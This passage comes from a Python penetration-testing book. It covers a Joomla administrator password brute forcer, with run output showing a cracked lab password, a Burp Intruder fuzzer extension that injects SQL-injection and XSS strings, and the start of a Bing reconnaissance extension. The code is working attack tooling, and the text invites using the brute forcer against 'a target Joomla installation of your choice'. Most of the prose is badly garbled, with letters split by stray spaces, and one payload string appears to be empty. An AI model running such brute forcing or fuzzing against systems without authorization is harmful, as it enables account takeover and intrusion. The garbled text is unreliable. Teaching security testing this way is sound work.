ap plic ati o n th at y o u m ig ht b e a tta ckin g. T he f ir s t th in g w e d o i s c re ate a d ic ti o nary i n w hic h o ur

re su lts w ill b e s to re d
➊ . W hen w e c all th e
feed
f u ncti o n, i t p asse s i n th e e nti r e H TM L d ocum ent a nd
our
handle_starttag
f u ncti o n i s c alle d w henev er a ta g i s e nco unte re d . I n p arti c ula r, w e’re l o okin g
fo r H TM L
input
ta gs
➋ a nd o ur m ain p ro cessin g o ccurs w hen w e d ete rm in e th at w e h av e f o und o ne.
We b egin i te ra ti n g o ver th e a ttr ib ute s o f th e ta g, a nd
if w e f in d th e n am e
➌ o r v alu e
➍ a ttr ib ute s, w e
asso cia te th em i n th e
tag_results
d ic ti o nary
➎ . A fte r th e H TM L h as b een p ro cesse d , o ur b ru te -
fo rc in g c la ss c an th en r e p la ce th e u se rn am e a nd p assw ord f ie ld s w hile l e av in g th e r e m ain d er o f th e
fie ld s i n ta ct.
HTM LPA RSE R 1 01
There a re th re e p rim ary m eth ods y ou c an im ple m ent w hen u sin g th e
HTMLParser
c la ss:
handle_starttag
,
handle_endtag
, a nd
handle_data
. T he
handle_starttag
f u nctio n w ill b e c alle d a ny tim e a n o penin g H TM L ta g is e ncounte re d, a nd th e o pposit e is tr u e
fo r th e
handle_endtag
f u nctio n, w hic h g ets c alle d e ach tim e a c lo sin g H TM L ta g is e ncounte re d . T he
handle_data
f u nctio n g ets
calle d w hen th ere is r a w te xt in b etw een ta gs . T he f u nctio n p ro to ty pes f o r e ach f u nctio n a re s lig htly d if fe re nt, a s f o llo w s:
handle_starttag(self, tag, attributes)
handle_endttag(self, tag)
handle_data(self, data)
A q uic k e xam ple to h ig hlig ht th is :
Python rocks!
handle_starttag => tag variable would be "title"
handle_data => data variable would be "Python rocks!"
handle_endtag => tag variable would be "title"
Wit h th is v ery b asic u nders ta ndin g o f th e
HTMLParser
c la ss, y ou c an d o th in gs lik e p ars e f o rm s, f in d lin ks f o r s p id erin g, e xtr a ct a ll o f
th e p ure te xt f o r d ata m in in g p urp ose s, o r f in d a ll o f th e im ages in a p age.
To w ra p u p o ur J o om la b ru te f o rc er, l e t’ s c o py-p aste th e
build_wordlist
f u ncti o n f r o m o ur p re v io us
se cti o n a nd a d d th e f o llo w in g c o de:
# paste the build_wordlist function here
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username,words)
bruter_obj.run_bruteforce()
That’ s i t! W e s im ply p ass i n th e u se rn am e a nd o ur w ord lis t to o ur
Bruter
c la ss a nd w atc h th e m agic
hap pen.

Kic k in g t h e T ir e s
If y o u d on’t h av e J o om la i n sta lle d i n to y o ur K ali V M , th en y o u s h o uld i n sta ll i t n o w . M y ta rg et V M i s
at
192.168.112.131
a nd I a m u sin g a w ord lis t p ro vid ed b y C ain a nd A bel,
[ 12
]
a p opula r b ru te -
fo rc in g a nd c ra ckin g to ols e t. I h av e a lr e ad y p re se t th e u se rn am e to
adm in
a nd th e p assw ord to
ju stin
in th e J o om la i n sta lla ti o n s o th at I c an m ake s u re i t w ork s. I th en a d ded
ju stin
to th e
ca in .t x t
w ord lis t
file a b out 5 0 e ntr ie s o r s o d ow n th e f ile . W hen r u nnin g th e s c rip t, I g et th e f o llo w in g o utp ut:
$
python2.7 joomla_killer.py
Finished setting up for: admin
Trying: admin : 0racl38 (306697 left)
Trying: admin : !@#$% (306697 left)
Trying: admin : !@#$%^ (306697 left)
--
snip
--
Trying: admin : 1p2o3i (306659 left)
Trying: admin : 1qw23e (306657 left)
Trying: admin : 1q2w3e (306656 left)
Trying: admin : 1sanjose (306655 left)
Trying: admin : 2 (306655 left)
Trying: admin : justin (306655 left)
Trying: admin : 2112 (306646 left)
[*] Bruteforce successful.
[*] Username: admin
[*] Password: justin
[*] Waiting for other threads to exit...
Trying: admin : 249 (306646 left)
Trying: admin : 2welcome (306646 left)
You c an s e e th at i t s u ccessfu lly b ru te -fo rc es a nd l o gs i n to th e J o om la a d m in is tr a to r c o nso le . T o
verify , y o u o f c o urs e w ould m anually l o g i n a nd m ake s u re . A fte r y o u te st th is l o cally a nd y o u’re
certa in i t w ork s, y o u c an u se th is to ol a gain st a ta rg et J o om la i n sta lla ti o n o f y o ur c ho ic e.
[ 10
]
Dir B uste r P ro je ct:
http s://w ww.o w asp .o rg /in dex.p hp/C ate g ory :O WASP _D ir B uste r_ P ro je ct
[ 11
]
SV NDig ger P ro je ct:
http s://w ww.m avitu nase cu rity .c o m /b lo g/s v n -d ig ger-b ette r-lis ts -fo r-fo rc ed -b ro w sin g/
[ 12
]
Cain a nd A bel:
http ://w ww.o xid .it/c a in .h tm l

Chap te r 6 . E xte n d in g B urp P ro x y
If y o u’v e e v er tr ie d h ackin g a w eb a p plic ati o n, y o u l ik ely h av e u se d B urp S uite to p erfo rm s p id erin g,
pro xy b ro w se r tr a ffic , a nd c arry o ut o th er a tta cks. R ecent v ers io ns o f B urp S uite i n clu d e th e a b ility to
ad d y o ur o w n to olin g, c alle d
Exte n sio ns
, to B urp . U sin g P yth o n, R ub y, o r p ure J a v a, y o u c an a d d
panels i n th e B urp G UI a nd b uild a uto m ati o n te chniq ues i n to B urp S uite . W e’re g o in g to ta ke
ad vanta ge o f th is f e atu re a nd a d d s o m e h and y to olin g to B urp f o r p erfo rm in g a tta cks a nd e xte nd ed
re co nnais sa nce. T he f ir s t e xte nsio n w ill e nab le u s to u ti liz e a n i n te rc ep te d H TTP r e q uest f r o m B urp
Pro xy a s a s e ed f o r c re ati n g a m uta ti o n f u zze r th at c an b e r u n i n B urp I n tr u d er. T he s e co nd e xte nsio n
will i n te rfa ce w ith th e M ic ro so ft B in g A PI to s h o w u s a ll v ir tu al h o sts l o cate d o n th e s a m e I P a d dre ss
as o ur ta rg et s ite , a s w ell a s a ny s u b dom ain s d ete cte d f o r th e ta rg et d om ain .
I’ m g o in g to a ssu m e th at y o u h av e p la yed w ith B urp b efo re a nd th at y o u k no w h o w to tr a p r e q uests
with th e P ro xy to ol, a s w ell a s h o w to s e nd a tr a p ped r e q uest to B urp I n tr u d er. I f y o u n eed a tu to ria l
on h o w to d o th ese ta sk s, p le ase v is it P ortS w ig ger W eb S ecurity (
http ://w ww.p orts w ig ger.n et/
) to g et
sta rte d .
I h av e to a d m it th at w hen I f ir s t s ta rte d e xp lo rin g th e B urp E xte nd er A PI, i t to ok m e a f e w a tte m pts to
und ers ta nd h o w i t w ork ed . I f o und i t a b it c o nfu sin g, a s I ’ m a p ure P yth o n g uy a nd h av e l im ite d J a v a
dev elo pm ent e xp erie nce. B ut I f o und a n um ber o f e xte nsio ns o n th e B urp w eb site th at l e t m e s e e h o w
oth er f o lk s h ad d ev elo ped e xte nsio ns, a nd I u se d th at p rio r a rt to h elp m e u nd ers ta nd h o w to b egin
im ple m enti n g m y o w n c o de. I ’ m g o in g to c o ver s o m e b asic s o n e xte nd in g f u ncti o nality , b ut I ’ ll a ls o
sh o w y o u h o w to u se th e A PI d ocum enta ti o n a s a g uid e f o r d ev elo pin g y o ur o w n e xte nsio ns.

Settin g U p
Fir s t, d ow nlo ad B urp f r o m
http ://w ww.p orts w ig ger.n et/
a nd g et i t r e ad y to g o . A s s a d a s i t m akes m e
to a d m it th is , y o u w ill r e q uir e a m odern J a v a i n sta lla ti o n, w hic h a ll o pera ti n g s y ste m s e ith er h av e
packages o r i n sta lle rs f o r. T he n ext s te p i s to g ra b th e J y th o n ( a P yth o n i m ple m enta ti o n w ritte n i n
Ja v a) s ta nd alo ne J A R f ile ; w e’ll p oin t B urp to th is . Y ou c an f in d th is J A R f ile o n th e N o S ta rc h s ite
alo ng w ith th e r e st o f th e b ook’s c o de (
http ://w ww.n osta rc h .c o m /b la ckh atp yth on/
) o r v is it th e
offic ia l s ite ,
http ://w ww.j y th on.o rg /d ow nlo ads.h tm l
, a nd s e le ct th e J y th o n 2 .7 S ta nd alo ne I n sta lle r.
Don’t l e t th e n am e f o ol y o u; i t’ s j u st a J A R f ile . S av e th e J A R f ile to a n e asy -to -re m em ber l o cati o n,
su ch a s y o ur D esk to p.
Next, o pen u p a c o m mand -lin e te rm in al, a nd r u n B urp l ik e s o :
#>
java -XX:MaxPermSize=1G -jar burpsuite_pro_v1.6.jar
This w ill g et B urp to f ir e u p a nd y o u s h o uld s e e i ts U I f u ll o f w ond erfu l ta b s, a s s h o w n i n
Fig ure 6 -1
.
Now l e t’ s p oin t B urp a t o ur J y th o n i n te rp re te r. C lic k th e
Exte nder
ta b , a nd th en c lic k th e
Optio ns
ta b . I n th e P yth o n E nv ir o nm ent s e cti o n, s e le ct th e l o cati o n o f y o ur J y th o n J A R f ile , a s s h o w n i n
Fig ure 6 -2
.
You c an l e av e th e r e st o f th e o pti o ns a lo ne, a nd w e s h o uld b e r e ad y to s ta rt c o din g o ur f ir s t e xte nsio n.
Let’ s g et r o ckin g!
Fig ure 6 -1 . B urp S uite G UI lo aded p ro perly

Fig ure 6 -2 . C onfig urin g th e J yth on in te rp re te r lo ca tio n

Burp F uzzin g
At s o m e p oin t i n y o ur c are er, y o u m ay f in d y o urs e lf a tta ckin g a w eb a p plic ati o n o r w eb s e rv ic e th at
doesn ’t a llo w y o u to u se tr a d iti o nal w eb a p plic ati o n a sse ssm ent to ols . W heth er w ork in g w ith a
bin ary p ro to co l w ra p ped i n sid e H TTP tr a ffic o r c o m ple x J S O N r e q uests , i t i s c riti c al th at y o u a re
ab le to te st f o r tr a d iti o nal w eb a p plic ati o n b ugs. T he a p plic ati o n m ig ht b e u sin g to o m any p ara m ete rs ,
or i t’ s o bfu sc ate d i n s o m e w ay th at p erfo rm in g a m anual te st w ould ta ke f a r to o m uch ti m e. I h av e a ls o
been g uilty o f r u nnin g s ta nd ard to ols th at a re n o t d esig ned to d eal w ith s tr a nge p ro to co ls o r e v en
JS O N i n a l o t o f c ase s. T his i s w here i t i s u se fu l to b e a b le to l e v era ge B urp to e sta b lis h a s o lid
base lin e o f H TTP tr a ffic , i n clu d in g a uth enti c ati o n c o okie s, w hile p assin g o ff th e b ody o f th e r e q uest
to a c usto m f u zze r th at c an th en m anip ula te th e p aylo ad i n a ny w ay y o u c ho ose . W e a re g o in g to w ork
on o ur f ir s t B urp e xte nsio n to c re ate th e w orld ’s s im ple st w eb a p plic ati o n f u zze r, w hic h y o u c an th en
exp and i n to s o m eth in g m ore i n te llig ent.
Burp h as a n um ber o f to ols th at y o u c an u se w hen y o u’re p erfo rm in g w eb a p plic ati o n te sts . T yp ic ally ,
yo u w ill tr a p a ll r e q uests u sin g th e P ro xy, a nd w hen y o u s e e a n i n te re sti n g r e q uest g o p ast, y o u’ll s e nd
it to a no th er B urp to ol. A c o m mon te chniq ue I u se i s to s e nd th em to th e R ep eate r to ol, w hic h l e ts m e
re p la y w eb tr a ffic , a s w ell a s m anually m odify a ny i n te re sti n g s p ots . T o p erfo rm m ore a uto m ate d
atta cks i n q uery p ara m ete rs , y o u w ill s e nd a r e q uest to th e I n tr u d er to ol, w hic h a tte m pts to
auto m ati c ally f ig ure o ut w hic h a re as o f th e w eb tr a ffic s h o uld b e m odifie d , a nd th en a llo w s y o u to u se
a v arie ty o f a tta cks to tr y to e lic it e rro r m essa ges o r te ase o ut v uln era b iliti e s. A B urp e xte nsio n c an
in te ra ct i n n um ero us w ays w ith th e B urp s u ite o f to ols , a nd i n o ur c ase w e’ll b e b olti n g a d diti o nal
fu ncti o nality o nto th e I n tr u d er to ol d ir e ctl y .
My f ir s t n atu ra l i n sti n ct i s to ta ke a l o ok a t th e B urp A PI d ocum enta ti o n to d ete rm in e w hat B urp
cla sse s I n eed to e xte nd i n o rd er to w rite m y c usto m e xte nsio n. Y ou c an a ccess th is d ocum enta ti o n b y
clic kin g th e
Exte nder
ta b a nd th en th e
APIs
ta b . T his c an l o ok a l ittl e d aunti n g b ecause i t l o oks ( a nd
is ) v ery J a v a-y . T he f ir s t th in g w e n o ti c e i s th at th e d ev elo pers o f B urp h av e a p tl y n am ed e ach c la ss
so th at i t’ s e asy to f ig ure o ut w here w e w ant to s ta rt. I n p arti c ula r, b ecause w e’re l o okin g a t f u zzin g
web r e q uests d urin g a n I n tr u d er a tta ck, I s e e th e
IIntruderPayloadGeneratorFactory
a nd
IIntruderPayloadGenerator
c la sse s. L et’ s ta ke a l o ok a t w hat th e d ocum enta ti o n s a ys f o r th e
IIntruderPayloadGeneratorFactory
c la ss:
/**
* Extensions can implement this interface and then call
➊ * IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory()
* to register a factory for custom Intruder payloads.
*/
public interface IIntruderPayloadGeneratorFactory
{
/**
* This method is used by Burp to obtain the name of the payload
* generator. This will be displayed as an option within the
* Intruder UI when the user selects to use extension-generated
* payloads.
*
* @return The name of the payload generator.
*/
➋ String getGeneratorName();
/**
* This method is used by Burp when the user starts an Intruder
* attack that uses this payload generator.

* @param attack
* An IIntruderAttack object that can be queried to obtain details
* about the attack in which the payload generator will be used.
* @return A new instance of
* IIntruderPayloadGenerator that will be used to generate
* payloads for the attack.
*/
➌ IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack);
}
The f ir s t b it o f d ocum enta ti o n
➊ te lls u s to g et o ur e xte nsio n r e gis te re d c o rre ctl y w ith B urp . W e’re
go in g to e xte nd th e m ain B urp c la ss a s w ell a s th e
IIntruderPayloadGeneratorFactory
c la ss.
Next w e s e e th at B urp i s e xp ecti n g tw o f u ncti o ns to b e p re se nt i n o ur m ain c la ss. T he
getGeneratorName
f u ncti o n
➋ w ill b e c alle d b y B urp to r e tr ie v e th e n am e o f o ur e xte nsio n, a nd w e
are e xp ecte d to r e tu rn a s tr in g. T he
createNewInstance
f u ncti o n
➌ e xp ects u s to r e tu rn a n i n sta nce
of th e
IIntruderPayloadGenerator
, w hic h w ill b e a s e co nd c la ss th at w e h av e to c re ate .
Now l e t’ s i m ple m ent th e a ctu al P yth o n c o de to m eet th ese r e q uir e m ents , a nd th en w e’ll l o ok a t h o w
th e
IIntruderPayloadGenerator
c la ss g ets a d ded . O pen a n ew P yth o n f ile , n am e i t
bhp_fu zze r.p y
,
and p unch o ut th e f o llo w in g c o de:
➊ from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator
from java.util import List, ArrayList
import random
➋ class BurpExtender(IBurpExtender, IIntruderPayloadGeneratorFactory):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
➌ callbacks.registerIntruderPayloadGeneratorFactory(self)
return
➍ def getGeneratorName(self):
return "BHP Payload Generator"
➎ def createNewInstance(self, attack):
return BHPFuzzer(self, attack)
So th is i s th e s im ple s k ele to n o f w hat w e n eed i n o rd er to s a ti s fy th e f ir s t s e t o f r e q uir e m ents f o r o ur
exte nsio n. W e h av e to f ir s t i m port th e
IBurpExtender
c la ss
➊ , w hic h i s a r e q uir e m ent f o r e v ery
exte nsio n w e w rite . W e f o llo w th is u p b y i m porti n g o ur n ecessa ry c la sse s f o r c re ati n g a n I n tr u d er
paylo ad g enera to r. N ext w e d efin e o ur
BurpExtender
c la ss
➋ , w hic h e xte nd s th e
IBurpExtender
and
IIntruderPayloadGeneratorFactory
c la sse s. W e th en u se th e
registerIntruderPayloadGeneratorFactory
f u ncti o n
➌ to r e gis te r o ur c la ss s o th at th e I n tr u d er
to ol i s a w are th at w e c an g enera te p aylo ad s. N ext w e i m ple m ent th e
getGeneratorName
f u ncti o n

to s im ply r e tu rn th e n am e o f o ur p ay-lo ad g enera to r. T he l a st s te p i s th e
createNewInstance
f u ncti o n
➎ th at r e ceiv es th e a tta ck p ara m ete r a nd r e tu rn s a n i n sta nce o f th e
IIntruderPayloadGenerator
cla ss, w hic h w e c alle d
BHPFuzzer
.
Let’ s h av e a p eek a t th e d ocum enta ti o n f o r th e
IIntruderPayloadGenerator
c la ss s o w e k no w w hat
to i m ple m ent.
/**

* This interface is used for custom Intruder payload generators.
* Extensions
* that have registered an
* IIntruderPayloadGeneratorFactory must return a new instance of
* this interface when required as part of a new Intruder attack.
*/
public interface IIntruderPayloadGenerator
{
/**
* This method is used by Burp to determine whether the payload
* generator is able to provide any further payloads.
*
* @return Extensions should return
* false when all the available payloads have been used up,
* otherwise true
*/
➊ boolean hasMorePayloads();
/**
* This method is used by Burp to obtain the value of the next payload.
*
* @param baseValue The base value of the current payload position.
* This value may be null if the concept of a base value is not
* applicable (e.g. in a battering ram attack).
* @return The next payload to use in the attack.
*/
➋ byte[] getNextPayload(byte[] baseValue);
/**
* This method is used by Burp to reset the state of the payload
* generator so that the next call to
* getNextPayload() returns the first payload again. This
* method will be invoked when an attack uses the same payload
* generator for more than one payload position, for example in a
* sniper attack.
*/
➌ void reset();
}
Okay! S o w e n eed to i m ple m ent th e b ase c la ss a nd i t n eed s to e xp ose th re e f u ncti o ns. T he f ir s t
fu ncti o n,
hasMorePayloads
➊ , i s s im ply th ere to d ecid e w heth er to c o nti n ue m uta te d r e q uests b ack
to B urp I n tr u d er. W e’ll j u st u se a c o unte r to d eal w ith th is , a nd o nce th e c o unte r i s a t th e m axim um th at
we s e t, w e’ll r e tu rn
False
s o th at n o m ore f u zzin g c ase s a re g enera te d . T he
getNextPayload
fu ncti o n
➋ w ill r e ceiv e th e o rig in al p aylo ad f r o m th e H TTP r e q uest th at y o u tr a p ped . O r, i f y o u h av e
se le cte d m ulti p le p aylo ad a re as i n th e H TTP r e q uest, y o u w ill o nly r e ceiv e th e b yte s th at y o u
re q ueste d to b e f u zze d ( m ore o n th is l a te r). T his f u ncti o n a llo w s u s to f u zz th e o rig in al te st c ase a nd
th en r e tu rn i t s o th at B urp s e nd s th e n ew f u zze d v alu e. T he l a st f u ncti o n,
reset
➌ , i s th ere s o th at i f
we g enera te a k no w n s e t o f f u zze d r e q uests — s a y f iv e o f th em — th en f o r e ach p aylo ad p ositi o n w e
hav e d esig nate d i n th e I n tr u d er ta b , w e w ill i te ra te th ro ugh th e f iv e f u zze d v alu es.
Our f u zze r i s n ’t s o f u ssy, a nd w ill a lw ays j u st k eep r a nd om ly f u zzin g e ach H TTP r e q uest. N ow l e t’ s
se e h o w th is l o oks w hen w e i m ple m ent i t i n P yth o n. A dd th e f o llo w in g c o de to th e b otto m o f
bhp_fu zze r.p y
:
➊ class BHPFuzzer(IIntruderPayloadGenerator):
def __init__(self, extender, attack):
self._extender = extender
self._helpers = extender._helpers
self._attack = attack
➋ self.max_payloads = 10
self.num_iterations = 0
return

➌ def hasMorePayloads(self):
if self.num_iterations == self.max_payloads:
return False
else:
return True
➍ def getNextPayload(self,current_payload):
# convert into a string
➎ payload = "".join(chr(x) for x in current_payload)
# call our simple mutator to fuzz the POST
➏ payload = self.mutate_payload(payload)
# increase the number of fuzzing attempts
➐ self.num_iterations += 1
return payload
def reset(self):
self.num_iterations = 0
return
We s ta rt b y d efin in g o ur
BHPFuzzer
c la ss
➊ th at e xte nd s th e c la ss
IIntruderPayloadGenerator
.
We d efin e th e r e q uir e d c la ss v aria b le s a s w ell a s a d d
max_payloads
➋ a nd
num_iterations
varia b le s s o th at w e c an k eep tr a ck o f w hen to l e t B urp k no w w e’re f in is h ed f u zzin g. Y ou c o uld o f
co urs e l e t th e e xte nsio n r u n f o re v er i f y o u l ik e, b ut f o r te sti n g w e’ll l e av e th is i n p la ce. N ext w e
im ple m ent th e
hasMorePayloads
f u ncti o n
➌ th at s im ply c hecks w heth er w e h av e r e ached th e
maxim um n um ber o f f u zzin g i te ra ti o ns. Y ou c o uld m odify th is to c o nti n ually r u n th e e xte nsio n b y
alw ays r e tu rn in g
True
. T he
getNextPayload
f u ncti o n
➍ i s th e o ne th at r e ceiv es th e o rig in al H TTP
paylo ad a nd i t i s h ere th at w e w ill b e f u zzin g. T he
current_payload
v aria b le a rriv es a s a b yte
arra y, s o w e c o nv ert th is to a s tr in g
➎ a nd th en p ass i t to o ur f u zzin g f u ncti o n
mutate_payload
➏ .
We th en i n cre m ent th e
num_iterations
v aria b le
➐ a nd r e tu rn th e m uta te d p aylo ad . O ur l a st f u ncti o n
is th e
reset
f u ncti o n th at r e tu rn s w ith o ut d oin g a nyth in g.
Now l e t’ s d ro p i n th e w orld ’s s im ple st f u zzin g f u ncti o n th at y o u c an m odify to y o ur h eart’ s c o nte nt.
Because th is f u ncti o n i s a w are o f th e c urre nt p aylo ad , i f y o u h av e a tr ic ky p ro to co l th at n eed s
so m eth in g s p ecia l, l ik e a C RC c hecksu m a t th e b egin nin g o f th e p aylo ad o r a l e ngth f ie ld , y o u c an d o
th o se c alc ula ti o ns i n sid e th is f u ncti o n b efo re r e tu rn in g, w hic h m akes i t e xtr e m ely f le xib le . A dd th e
fo llo w in g c o de to
bhp_fu zze r.p y
, m akin g s u re th at th e
mutate_payload
f u ncti o n i s ta b bed i n to o ur
BHPFuzzer
c la ss:
def mutate_payload(self,original_payload):
# pick a simple mutator or even call an external script
picker = random.randint(1,3)
# select a random offset in the payload to mutate
offset = random.randint(0,len(original_payload)-1)
payload = original_payload[:offset]
# random offset insert a SQL injection attempt
if picker == 1:
payload += "'"
# jam an XSS attempt in
if picker == 2:
payload += ""
# repeat a chunk of the original payload a random number
if picker == 3:

chunk_length = random.randint(len(payload[offset:]),len(payload)-1)
repeater = random.randint(1,10)
for i in range(repeater):
payload += original_payload[offset:offset+chunk_length]
# add the remaining bits of the payload
payload += original_payload[offset:]
return payload
This s im ple f u zze r i s p re tty s e lf- e xp la nato ry . W e’ll r a nd om ly p ic k f r o m th re e m uta to rs : a s im ple S Q L
in je cti o n te st w ith a s in gle -q uo te , a n X SS a tte m pt, a nd th en a m uta to r th at s e le cts a r a nd om c hunk i n
th e o rig in al p aylo ad a nd r e p eats i t a r a nd om n um ber o f ti m es. W e n o w h av e a B urp I n tr u d er e xte nsio n
th at w e c an u se . L et’ s ta ke a l o ok a t h o w w e c an g et i t l o ad ed .

Kic k in g t h e T ir e s
Fir s t w e h av e to g et o ur e xte nsio n l o ad ed a nd m ake s u re th ere a re n o e rro rs . C lic k th e
Exte nder
ta b
in B urp a nd th en c lic k th e
Add
b utto n. A s c re en a p pears th at w ill a llo w y o u to p oin t B urp a t th e
fu zze r. E nsu re th at y o u s e t th e s a m e o pti o ns a s s h o w n i n
Fig ure 6 -3
.
Fig ure 6 -3 . S ettin g B urp to lo ad o ur e xte n sio n
Clic k
Next
a nd B urp w ill b egin l o ad in g o ur e xte nsio n. I f a ll g o es w ell, B urp s h o uld i n d ic ate th at th e
exte nsio n w as l o ad ed s u ccessfu lly . I f th ere a re e rro rs , c lic k th e
Erro rs
ta b , d eb ug a ny ty p os, a nd th en
clic k th e
Clo se
b utto n. Y our E xte nd er s c re en s h o uld n o w l o ok l ik e
Fig ure 6 -4
.

Fig ure 6 -4 . B urp E xte n der s h ow in g th at o ur e xte n sio n is lo aded
You c an s e e th at o ur e xte nsio n i s l o ad ed a nd th at B urp h as i d enti fie d th at a n I n tr u d er p aylo ad
genera to r i s r e gis te re d . W e a re n o w r e ad y to l e v era ge o ur e xte nsio n i n a r e al a tta ck. M ake s u re y o ur
web b ro w se r i s s e t to u se B urp P ro xy a s a l o calh o st p ro xy o n p ort 8 080, a nd l e t’ s a tta ck th e s a m e
Acuneti x w eb a p plic ati o n f r o m
Chap te r 5
. S im ply b ro w se to :
http://testphp.vulnweb.com
As a n e xam ple , I u se d th e l ittl e s e arc h b ar o n th eir s ite to s u b m it a s e arc h f o r th e s tr in g “ te st” .
Fig ure 6 -5
s h o w s h o w I c an s e e th is r e q uest i n th e H TTP h is to ry ta b o f th e P ro xy ta b , a nd I h av e r ig ht-
clic ked th e r e q uest to s e nd i t to I n tr u d er.

Fig ure 6 -5 . S ele ctin g a n H TTP r e q uest to s e n d to I n tr u der
Now s w itc h to th e
In tr u der
ta b a nd c lic k th e
Posit io ns
ta b . A s c re en a p pears th at s h o w s e ach q uery
para m ete r h ig hlig hte d . T his i s B urp i d enti fy in g th e s p ots w here w e s h o uld b e f u zzin g. Y ou c an tr y
movin g th e p aylo ad d elim ite rs a ro und o r s e le cti n g th e e nti r e p aylo ad to f u zz i f y o u c ho ose , b ut i n o ur
case l e t’ s l e av e B urp to d ecid e w here w e a re g o in g to f u zz. F or c la rity , s e e
Fig ure 6 -6
, w hic h s h o w s
ho w p aylo ad h ig hlig hti n g w ork s.
Now c lic k th e
Paylo ads
ta b . I n th is s c re en, c lic k th e
Paylo ad t y pe
d ro p-d ow n a nd s e le ct
Exte nsio n-
genera te d
. I n th e P aylo ad O pti o ns s e cti o n, c lic k th e
Sele ct g enera to r...
b utto n a nd c ho ose
BH P
Paylo ad G enera to r
f r o m th e d ro p-d ow n. Y our P aylo ad s c re en s h o uld n o w l o ok l ik e
Fig ure 6 -7
.

Fig ure 6 -6 . B urp I n tr u der h ig hlig htin g p aylo ad p ara m ete rs
Fig ure 6 -7 . U sin g o ur f u zzin g e xte n sio n a s a p aylo ad g en era to r

Now w e’re r e ad y to s e nd o ur r e q uests . A t th e to p o f th e B urp m enu b ar, c lic k
In tr u der
a nd th en s e le ct
Sta rt A tta ck
. T his s ta rts s e nd in g f u zze d r e q uests , a nd y o u w ill b e a b le to q uic kly g o th ro ugh th e
re su lts . W hen I r a n th e f u zze r, I r e ceiv ed o utp ut a s s h o w n i n
Fig ure 6 -8
.
Fig ure 6 -8 . O ur f u zze r r u nnin g in a n I n tr u der a tta ck
As y o u c an s e e f r o m th e w arn in g o n l in e 6 1 o f th e r e sp onse , i n r e q uest 5 , w e d is c o vere d w hat
ap pears to b e a S Q L i n je cti o n v uln era b ility .
Now o f c o urs e , o ur f u zze r i s o nly f o r d em onstr a ti o n p urp ose s, b ut y o u’ll b e s u rp ris e d h o w e ffe cti v e i t
can b e f o r g etti n g a w eb a p plic ati o n to o utp ut e rro rs , d is c lo se a p plic ati o n p ath s, o r b ehav e i n w ays
th at l o ts o f o th er s c anners m ig ht m is s. T he i m porta nt th in g i s to u nd ers ta nd h o w w e m anaged to g et o ur
custo m e xte nsio n i n l in e w ith I n tr u d er a tta cks. N ow l e t’ s c re ate a n e xte nsio n th at w ill a ssis t u s i n
perfo rm in g s o m e e xte nd ed r e co nnais sa nce a gain st a w eb s e rv er.

Bin g f o r B urp
When y o u’re a tta ckin g a w eb s e rv er, i t’ s n o t u nco m mon f o r th at s in gle m achin e to s e rv e s e v era l w eb
ap plic ati o ns, s o m e o f w hic h y o u m ig ht n o t b e a w are o f. O f c o urs e , y o u w ant to d is c o ver th ese
ho stn am es e xp ose d o n th e s a m e w eb s e rv er b ecause th ey m ig ht g iv e y o u a n e asie r w ay to g et a s h ell.
It’ s n o t r a re to f in d a n i n se cure w eb a p plic ati o n o r e v en d ev elo pm ent r e so urc es
lo cate d o n th e s a m e
machin e a s y o ur ta rg et. M ic ro so ft’ s B in g s e arc h e ngin e h as s e arc h c ap ab iliti e s th at a llo w y o u to q uery
Bin g f o r a ll w eb site s i t f in d s o n a s in gle I P a d dre ss ( u sin g th e “ IP ” s e arc h m odifie r). B in g w ill a ls o
te ll y o u a ll o f th e s u b dom ain s o f a g iv en d om ain ( u sin g th e “ d om ain ” m odifie r).
Now w e c o uld , o f c o urs e , u se a s c ra p er to s u b m it th ese q uerie s to B in g a nd th en s c ra p e th e H TM L i n
th e r e su lts , b ut th at w ould b e b ad m anners ( a nd a ls o v io la te m ost s e arc h e ngin es’ te rm s o f u se ). I n
ord er to s ta y o ut o f tr o ub le , w e c an u se th e B in g A PI
[ 13
]
to s u b m it th ese q uerie s p ro gra m mati c ally a nd
th en p ars e th e r e su lts o urs e lv es. W e w on’t i m ple m ent a ny f a ncy B urp G UI a d diti o ns ( o th er th an a
co nte xt m enu) w ith th is e xte nsio n; w e s im ply o utp ut th e r e su lts i n to B urp e ach ti m e w e r u n a q uery ,
and a ny d ete cte d U RLs to B urp ’s ta rg et s c o pe w ill b e a d ded a uto m ati c ally . B ecause I a lr e ad y w alk ed
yo u th ro ugh h o w to r e ad th e B urp A PI d ocum enta ti o n a nd tr a nsla te i t i n to P yth o n, w e’re g o in g to g et
rig ht to th e c o de.
Cra ck o pen
bhp_bin g.p y
a nd h am mer o ut th e f o llo w in g c o de:
from burp import IBurpExtender
from burp import IContextMenuFactory
from javax.swing import JMenuItem
from java.util import List, ArrayList
from java.net import URL
import socket
import urllib
import json
import re
import base64
➊ bing_api_key = "YOURKEY"
➋ class BurpExtender(IBurpExtender, IContextMenuFactory):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
self.context = None
# we set up our extension
callbacks.setExtensionName("BHP Bing")
➌ callbacks.registerContextMenuFactory(self)
return
def createMenuItems(self, context_menu):
self.context = context_menu
menu_list = ArrayList()
➍ menu_list.add(JMenuItem("Send to Bing", actionPerformed=self.bing_
menu))
return menu_list
This i s th e f ir s t b it o f o ur B in g e xte nsio n. M ake s u re y o u h av e y o ur B in g A PI k ey p aste d i n p la ce
➊ ;
yo u a re a llo w ed s o m eth in g l ik e 2 ,5 00 f r e e s e arc hes p er m onth . W e b egin b y d efin in g o ur
BurpExtender
c la ss
➋ th at i m ple m ents th e s ta nd ard
IBurpExtender
i n te rfa ce a nd th e
IContextMenuFactory
, w hic h a llo w s u s to p ro vid e a c o nte xt m enu w hen a u se r r ig ht- c lic ks a
re q uest i n B urp . W e r e gis te r o ur m enu h and le r
➌ s o th at w e c an d ete rm in e w hic h s ite th e u se r

clic ked , w hic h th en e nab le s u s to c o nstr u ct o ur B in g q uerie s. T he l a st s te p i s to s e t u p o ur
createMenuItem
f u ncti o n, w hic h w ill r e ceiv e a n
IContextMenuInvocation
o bje ct th at w e w ill u se
to d ete rm in e w hic h H TTP r e q uest w as s e le cte d . T he l a st s te p i s to r e nd er o ur m enu i te m a nd h av e th e
bing_menu
